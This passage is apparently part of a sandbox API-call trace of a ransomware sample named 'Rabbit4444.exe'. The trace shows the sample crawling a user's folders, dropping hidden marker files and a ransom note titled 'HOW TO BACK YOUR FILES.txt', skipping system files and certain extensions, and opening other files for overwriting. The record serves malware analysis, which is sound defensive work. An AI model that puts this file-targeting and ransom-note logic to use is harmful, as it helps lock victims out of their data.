dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0069.270] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0069.270] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.271] CloseHandle (hObject=0x280) returned 1 [0069.271] CloseHandle (hObject=0x228) returned 1 [0069.271] GetCurrentThreadId () returned 0xd98 [0069.271] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0069.271] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT" [0069.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116860 | out: hHeap=0xe0000) returned 1 [0069.271] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0069.271] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT" [0069.271] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\" [0069.271] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\.BFC0E91B00AE8A0620D3" [0069.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0069.272] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0069.275] FlushFileBuffers (hFile=0x228) returned 1 [0069.277] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0069.277] CloseHandle (hObject=0x228) returned 1 [0069.278] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT") returned 99 [0069.278] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.278] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc23d3cb7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf8c86a16, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf29c2482, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0069.278] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.278] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.278] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0069.278] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.278] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc23d3cb7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf8c86a16, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf29c2482, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.278] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.278] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.278] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0069.278] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.278] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.278] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf29c2482, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf29c2482, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf29c2482, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0069.278] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.278] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0069.278] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2636207, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2", cAlternateFileName="")) returned 1 [0069.278] lstrcmpiW (lpString1="2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.278] lstrcmpiW (lpString1="2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.278] lstrcmpiW (lpString1="2", lpString2="Rabbit4444.exe") returned -1 [0069.278] lstrcmpiW (lpString1="2", lpString2=".") returned 1 [0069.278] lstrcmpiW (lpString1="2", lpString2="..") returned 1 [0069.278] lstrcmpiW (lpString1="2", lpString2="windows") returned -1 [0069.278] lstrcmpiW (lpString1="2", lpString2="bootmgr") returned -1 [0069.278] lstrcmpiW (lpString1="2", lpString2="pagefile.sys") returned -1 [0069.278] lstrcmpiW (lpString1="2", lpString2="boot") returned -1 [0069.279] lstrcmpiW (lpString1="2", lpString2="ids.txt") returned -1 [0069.279] lstrcmpiW (lpString1="2", lpString2="NTUSER.DAT") returned -1 [0069.279] lstrcpyW (in: lpString1=0x130ec00, lpString2="2" | out: lpString1="2") returned="2" [0069.279] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2", dwFileAttributes=0x2012) returned 1 [0069.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0069.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108688 [0069.279] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x11d048 [0069.279] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8c607c0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf9125365, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf9125365, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4", cAlternateFileName="")) returned 1 [0069.280] lstrcmpiW (lpString1="4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.280] lstrcmpiW (lpString1="4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.280] lstrcmpiW (lpString1="4", lpString2="Rabbit4444.exe") returned -1 [0069.280] lstrcmpiW (lpString1="4", lpString2=".") returned 1 [0069.280] lstrcmpiW (lpString1="4", lpString2="..") returned 1 [0069.280] lstrcmpiW (lpString1="4", lpString2="windows") returned -1 [0069.280] lstrcmpiW (lpString1="4", lpString2="bootmgr") returned -1 [0069.280] lstrcmpiW (lpString1="4", lpString2="pagefile.sys") returned -1 [0069.280] lstrcmpiW (lpString1="4", lpString2="boot") returned -1 [0069.280] lstrcmpiW (lpString1="4", lpString2="ids.txt") returned -1 [0069.280] lstrcmpiW (lpString1="4", lpString2="NTUSER.DAT") returned -1 [0069.280] lstrcpyW (in: lpString1=0x130ec00, lpString2="4" | out: lpString1="4") returned="4" [0069.280] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4", dwFileAttributes=0x2012) returned 1 [0069.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0069.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108760 [0069.280] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122268 [0069.280] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc23d3cb7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc23d3cb7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc23d3cb7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0069.280] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0069.281] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0069.281] lstrcpyW (in: lpString1=0x130ec00, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0069.281] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\container.dat", dwFileAttributes=0x2022) returned 1 [0069.281] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\container.dat", dwFileAttributes=0x2006) returned 1 [0069.281] lstrlenW (lpString="container.dat") returned 13 [0069.281] lstrlenW (lpString="Rabbit4444") returned 10 [0069.281] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0069.281] lstrlenW (lpString=".dll") returned 4 [0069.281] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0069.281] lstrlenW (lpString=".lnk") returned 4 [0069.281] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0069.281] lstrlenW (lpString=".ini") returned 4 [0069.281] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0069.281] lstrlenW (lpString=".sys") returned 4 [0069.281] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0069.281] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc23d3cb7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc23d3cb7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc23d3cb7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0069.281] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0069.281] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0069.282] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0069.283] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0069.283] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0069.284] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.284] CloseHandle (hObject=0x280) returned 1 [0069.284] CloseHandle (hObject=0x228) returned 1 [0069.284] GetCurrentThreadId () returned 0xd98 [0069.284] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0069.284] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4" [0069.284] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0069.284] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0069.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4" [0069.284] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\" [0069.284] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\.BFC0E91B00AE8A0620D3" [0069.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0069.286] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0069.289] FlushFileBuffers (hFile=0x228) returned 1 [0069.290] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0069.290] CloseHandle (hObject=0x228) returned 1 [0069.290] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4") returned 101 [0069.290] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.290] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf8c607c0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf9125365, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf29e86b8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0069.290] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.291] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.291] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0069.291] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.291] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf8c607c0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf9125365, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf29e86b8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.297] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.297] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0069.297] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0069.297] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.297] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.297] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf29e86b8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf29e86b8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf29e86b8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0069.297] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.297] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0069.297] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8c607c0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8c607c0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf8c607c0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x165c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="appcache[1].man", cAlternateFileName="APPCAC~1.MAN")) returned 1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2="Rabbit4444.exe") returned -1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2=".") returned 1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2="..") returned 1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2="windows") returned -1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2="bootmgr") returned -1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2="pagefile.sys") returned -1 [0069.297] lstrcmpiW (lpString1="appcache[1].man", lpString2="boot") returned -1 [0069.298] lstrcmpiW (lpString1="appcache[1].man", lpString2="ids.txt") returned -1 [0069.298] lstrcmpiW (lpString1="appcache[1].man", lpString2="NTUSER.DAT") returned -1 [0069.298] lstrcpyW (in: lpString1=0x130ec04, lpString2="appcache[1].man" | out: lpString1="appcache[1].man") returned="appcache[1].man" [0069.298] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\appcache[1].man", dwFileAttributes=0x2000) returned 1 [0069.298] lstrlenW (lpString="appcache[1].man") returned 15 [0069.298] lstrlenW (lpString="Rabbit4444") returned 10 [0069.298] lstrcmpiW (lpString1="che[1].man", lpString2="Rabbit4444") returned -1 [0069.298] lstrlenW (lpString=".dll") returned 4 [0069.298] lstrcmpiW (lpString1=".man", lpString2=".dll") returned 1 [0069.299] lstrlenW (lpString=".lnk") returned 4 [0069.299] lstrcmpiW (lpString1=".man", lpString2=".lnk") returned 1 [0069.299] lstrlenW (lpString=".ini") returned 4 [0069.299] lstrcmpiW (lpString1=".man", lpString2=".ini") returned 1 [0069.299] lstrlenW (lpString=".sys") returned 4 [0069.299] lstrcmpiW (lpString1=".man", lpString2=".sys") returned -1 [0069.299] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\appcache[1].man" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\appcache[1].man"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.299] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.299] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16060986329) returned 1 [0069.299] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5724) returned 1 [0069.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0069.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0069.299] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1960, lpName=0x0) returned 0x29c [0069.300] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1960) returned 0x70000 [0069.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0069.302] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0069.302] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0069.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.303] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 